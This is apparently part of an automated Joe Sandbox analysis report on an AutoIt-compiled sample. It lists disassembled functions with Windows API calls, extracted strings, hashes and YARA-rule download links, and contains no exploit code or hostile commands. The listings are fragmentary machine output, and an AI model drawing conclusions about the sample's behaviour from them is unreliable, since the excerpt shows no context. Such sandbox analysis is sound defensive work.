                                                                                                                    • Instruction Fuzzy Hash: 44C185322251934ADB6D4A39843453EFAA15EB27B131A075FD8B3DB6D4EF20CD39D620
                                                                                                                    Function 002D25FA Relevance: .3, Instructions: 341COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction ID: b249df14c53e36a423b5e3518c17bd6ffdb761fbbb86f0bb43498c5b5d4ee35f
                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction Fuzzy Hash: D2C1863222519349DF2D4A39C43413EFAA15EA27B132A076FD4B2DB6D5EF10CD39D660
                                                                                                                    Function 002D1978 Relevance: .3, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction ID: 0e32be9daf88620cc8a5891c26c8758e048869feda8c7f539465a823ce6ae3fc
                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction Fuzzy Hash: 1EC1743222519319DF2D4A39C47413EBAA25EA2BB131A075FD4B3CBAD5EF20CD75D620
                                                                                                                    Function 00327806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0032785B
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0032786D
                                                                                                                    • DestroyWindow.USER32 ref: 0032787B
                                                                                                                    • GetDesktopWindow.USER32 ref: 00327895
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0032789C
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003279DD
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003279ED
                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A35
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00327A41
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00327A7B
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A9D
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AB0
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327ABB
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00327AC4
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AD3
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00327ADC
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AE3
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00327AEE
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327B00
                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00342CAC,00000000), ref: 00327B16
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00327B26
                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00327B4C
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00327B6B
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327B8D
                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327D7A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 3b32a5759970379beabfc474944fd2823228e4d7d6602dda67b303bb04e19434
                                                                                                                    • Instruction ID: 4820b5e45e2f02cb4e78e213bf59d4baa87a001b83449700074cfff72dbb558d
                                                                                                                    • Opcode Fuzzy Hash: 3b32a5759970379beabfc474944fd2823228e4d7d6602dda67b303bb04e19434
                                                                                                                    • Instruction Fuzzy Hash: 71026A71910215EFDB16DFA8EC89EAE7BB9FF48310F508158F915AB2A1C770AD41CB60
                                                                                                                    Function 0033356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,0033F910), ref: 00333627
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0033364B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: efa7dcb01bb4eca1b386934548603f4a78d686e221f73efe355a0939f63f7285
                                                                                                                    • Instruction ID: c7abc9458f43a0caf0e2a7854b274f7f1c2d5efb9b792ac4a8e194dfc76b4705
                                                                                                                    • Opcode Fuzzy Hash: efa7dcb01bb4eca1b386934548603f4a78d686e221f73efe355a0939f63f7285
                                                                                                                    • Instruction Fuzzy Hash: D0D1A1342183019FCB06EF10C4D2BAE77A9AF95394F058459F9825B7E2CB31EE5ACB41
                                                                                                                    Function 0033A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0033A630
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0033A661
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0033A66D
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0033A687
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0033A696
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0033A6C1
                                                                                                                    • GetSysColor.USER32(00000010), ref: 0033A6C9
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0033A6D0
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0033A6DF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0033A6E6
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0033A731
                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0033A763
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033A78E
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(00000012), ref: 0033A903
                                                                                                                      • Part of subcall function 0033A8CA: SetTextColor.GDI32(?,?), ref: 0033A907
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColorBrush.USER32(0000000F), ref: 0033A91D
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(0000000F), ref: 0033A928
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(00000011), ref: 0033A945
                                                                                                                      • Part of subcall function 0033A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033A953
                                                                                                                      • Part of subcall function 0033A8CA: SelectObject.GDI32(?,00000000), ref: 0033A964
                                                                                                                      • Part of subcall function 0033A8CA: SetBkColor.GDI32(?,00000000), ref: 0033A96D
                                                                                                                      • Part of subcall function 0033A8CA: SelectObject.GDI32(?,?), ref: 0033A97A
                                                                                                                      • Part of subcall function 0033A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0033A999
                                                                                                                      • Part of subcall function 0033A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033A9B0
                                                                                                                      • Part of subcall function 0033A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0033A9C5
                                                                                                                      • Part of subcall function 0033A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033A9ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: 7d0894e2b6084ab0b07ae7591a1da2aba91b786ddb0c9941c6e71397457c43bc
                                                                                                                    • Instruction ID: 16edd0fcd4ce6584c37255f21f87258863aef322227246ded3a0e2d73c1e0864
                                                                                                                    • Opcode Fuzzy Hash: 7d0894e2b6084ab0b07ae7591a1da2aba91b786ddb0c9941c6e71397457c43bc
                                                                                                                    • Instruction Fuzzy Hash: B2917B72808701FFD7129F64DC88A5BBBADFF89321F500B29F9A2961A0D771D944CB52
                                                                                                                    Function 002B2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 002B2CA2
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002B2CE8
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002B2CF3
                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 002B2CFE
                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 002B2D09
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 002EC43B
                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002EC474
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002EC89D
                                                                                                                      • Part of subcall function 002B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2036,?,00000000,?,?,?,?,002B16CB,00000000,?), ref: 002B1B9A
                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 002EC8DA
                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002EC8F1
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002EC907
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002EC912
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                    • Opcode ID: c72178c61b0725262d65f6b98bd07c02c212a7885bb102876f280b15463ded5f
                                                                                                                    • Instruction ID: e10b30bca5ad7525c034ebaec18eccea32d49e7866f922b659910cf8d9669599
                                                                                                                    • Opcode Fuzzy Hash: c72178c61b0725262d65f6b98bd07c02c212a7885bb102876f280b15463ded5f
                                                                                                                    • Instruction Fuzzy Hash: EA12BD30660242EFDB15CF25C884BA9BBE5FF45340FA4456AF895DB262C731E866CF90
                                                                                                                    Function 003274AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003274DE
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0032759D
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003275DB
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003275ED
                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00327633
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0032763F
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00327683
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00327692
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003276A2
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003276A6
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003276B6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003276BF
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003276C8
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003276F4
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0032770B
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00327746
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0032775A
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0032776B
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0032779B
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003277A6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003277B1
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003277BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: fca24822a71fce80bc5c5d5159b01c214a9989a847982036ed78a6de6a316068
                                                                                                                    • Instruction ID: 9682c3bd4f4818fc2a8140b20d69da9e1c9aac810f2400ff67b9a97cebe3beb2
                                                                                                                    • Opcode Fuzzy Hash: fca24822a71fce80bc5c5d5159b01c214a9989a847982036ed78a6de6a316068
                                                                                                                    • Instruction Fuzzy Hash: 04A184B1A10615BFEB15DBA4DC8AFAEBB7DEB05710F108114FA14A72E1C7B0AD40CB60
                                                                                                                    Function 0031AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031AD1E
                                                                                                                    • GetDriveTypeW.KERNEL32(?,0033FAC0,?,\\.\,0033F910), ref: 0031ADFB
                                                                                                                    • SetErrorMode.KERNEL32(00000000,0033FAC0,?,\\.\,0033F910), ref: 0031AF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 77ece4d477ccbe5b5605c02a716f9b335c0cc3f5ed080c2518dc60dc702cf760
                                                                                                                    • Instruction ID: 9902a431d96a7af0046d5ccc70534120b7db441fc0d067162adbb2c5175ae01e
                                                                                                                    • Opcode Fuzzy Hash: 77ece4d477ccbe5b5605c02a716f9b335c0cc3f5ed080c2518dc60dc702cf760
                                                                                                                    • Instruction Fuzzy Hash: 4251B4B064AA059B8B1BEB50CD92CFD7364EF4C702B208157E807A76D4CA30DD96DB52
                                                                                                                    Function 002B68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                    • Opcode ID: 735d39bcf60549001f978fea2546abf85f6c2930b51d6cb60df744c11c66e1fe
                                                                                                                    • Instruction ID: 87e24167dbfe78e1703c5fd8f42db45d0bab70a28854911c0ad2f9107257e725
                                                                                                                    • Opcode Fuzzy Hash: 735d39bcf60549001f978fea2546abf85f6c2930b51d6cb60df744c11c66e1fe
                                                                                                                    • Instruction Fuzzy Hash: A2815CB06606066ADF21AF61DC57FFF7768AF04780F444025F805AA1D2EBB4DD35CAA1
                                                                                                                    Function 00339A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00339AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00339B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00339BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: fbba4fa58a0cdc96e5c59c894e4357c5e5abfc969485a8f7d45ea8d82a83e26d
                                                                                                                    • Instruction ID: 460fb7ac69d2180f9ccbc2ab67a877d8ce7a468634969104ca6a2f7514e44d38
                                                                                                                    • Opcode Fuzzy Hash: fbba4fa58a0cdc96e5c59c894e4357c5e5abfc969485a8f7d45ea8d82a83e26d
                                                                                                                    • Instruction Fuzzy Hash: DF02AF30508301EFD726CF14C8C9BAABBE9FF49315F04452EF999962A1C7B5D944CB52
                                                                                                                    Function 0033A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0033A903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0033A907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0033A91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0033A928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0033A92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 0033A945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033A953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0033A964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0033A96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 0033A97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0033A999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033A9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0033A9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033A9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0033AA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0033AA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0033AA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 0033AA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0033AA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0033AA67
                                                                                                                    • SelectObject.GDI32(?,0033A5FA), ref: 0033AA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 0033AA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 0033AA8F
